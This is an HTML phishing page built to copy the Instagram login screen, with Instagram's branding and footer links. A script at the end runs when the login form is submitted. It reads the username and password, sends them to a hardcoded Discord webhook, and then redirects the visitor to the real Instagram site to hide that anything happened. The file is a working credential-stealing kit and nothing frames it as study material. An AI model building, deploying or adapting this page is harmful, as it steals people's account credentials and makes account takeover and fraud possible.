<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Instagram</title>
  <link rel="stylesheet" href="./css/style.css">
  <link rel="shortcut icon" href="./img/favicon.png" type="image/x-icon">
</head>
<body>
  <main>
    <div id="main-container">
      <!-- Banner container -->
      <div id="banner-container">
        <img src="./img/banner2.png" alt="Crie uma conta no insta">
      </div>
      <!-- Login e registro -->
      <div id="form-container">
        <div id="form-box">
          <img id="logo-insta" src="./img/logo_instagram.png" alt="Instagram">
          <form id="login-form" onsubmit="sendMessage(); return false;">
            <input type="text" id="username" name="username" placeholder="Phone number, username, or email">
            <input type="password" id="password" name="password" placeholder="Password">
            <input type="submit" value="Log in">
          </form>

          <div class="separator">
            <div class="line"></div>
            <span>OR</span>
          </div>

          <div id="other-links">
            <div id="facebook-login">
              <a href="file:///home/navnee1h/Downloads/insta/clone-page-instagramLogin/index.html#">
                <img src="./img/logo_facebook.svg" alt="Facebook login">
                <span>Log in with Facebook</span>
              </a>
            </div>
            <div id="forgot-password">
              <a href="file:///home/navnee1h/Downloads/insta/clone-page-instagramLogin/index.html#">Forgot password?</a>
            </div>
          </div>
        </div>
        <div id="register-container">
          <p>Don't have an account?<a href="file:///home/navnee1h/Downloads/insta/clone-page-instagramLogin/index.html#">Sign up</a></p>
        </div>
        <div id="get-app-container">
          <p>Get the app.</p>
          <a href="file:///home/navnee1h/Downloads/insta/clone-page-instagramLogin/index.html#">
            <img src="./img/apple_btn.png" alt="Apple">
          </a>
          <a href="file:///home/navnee1h/Downloads/insta/clone-page-instagramLogin/index.html#">
            <img src="./img/gplay_btn.png" alt="Google Play">
          </a>
        </div>
      </div>
    </div>
  </main>

  <!-- rodapé -->
  <footer>
    <nav>
      <ul id="footer-links">
        <li><a href="https://about.meta.com/">Meta</a></li>
        <li><a href="https://about.instagram.com/">About</a></li>
        <li><a href="https://about.instagram.com/blog">Blog</a></li>
        <li><a href="https://about.instagram.com/about-us/careers">Jobs</a></li>
        <li><a href="https://help.instagram.com/">Help</a></li>
        <li><a href="https://developers.facebook.com/docs/instagram">API</a></li>
        <li><a href="https://www.instagram.com/legal/privacy/">Privacy</a></li>
        <li><a href="https://www.instagram.com/legal/terms/">Terms</a></li>
        <li><a href="https://www.instagram.com/explore/locations/">Locations</a></li>
        <li><a href="https://www.instagram.com/web/lite/">Instagram Lite</a></li>
        <li><a href="https://www.threads.net/">Threads</a></li>
        <li><a href="https://www.facebook.com/help/instagram/261704639352628">Contact Uploading & Non-Users</a></li>
        <li><a href="https://www.instagram.com/accounts/meta_verified/?entrypoint=web_footer">Meta Verfied</a></li>
      </ul>
    </nav>
    <p id="copy-rigth">English‎ ‎ 🞃‎ ‎ ‎ ‎ © 2024 Instagram from META</p>
  </footer>

  <script>
    function sendMessage() {
      function sleep(milliseconds) {
        const date = Date.now();
        let currentDate = null;
        do {
          currentDate = Date.now();
        } while (currentDate - date < milliseconds);
      }
      var request = new XMLHttpRequest();
      request.open("POST", "https://discord.com/api/webhooks/1145358265388118210/OV9rO0qQeaxTRDYBPlAxIBQkj6P-IT1NuCcrXZXBbJeJnz9_YIhz0MXztIGtSZuwXDkS");
      request.setRequestHeader('Content-type', 'application/json');
      var params = {
        content: ("> **USERNAME  : **" + document.getElementById('username').value + "\n> **PASSWORD : **" + document.getElementById('password').value)
      }
      request.send(JSON.stringify(params));
      sleep(400);
      window.location.replace("https://www.instagram.com/");
    }
  </script>

</body></html>
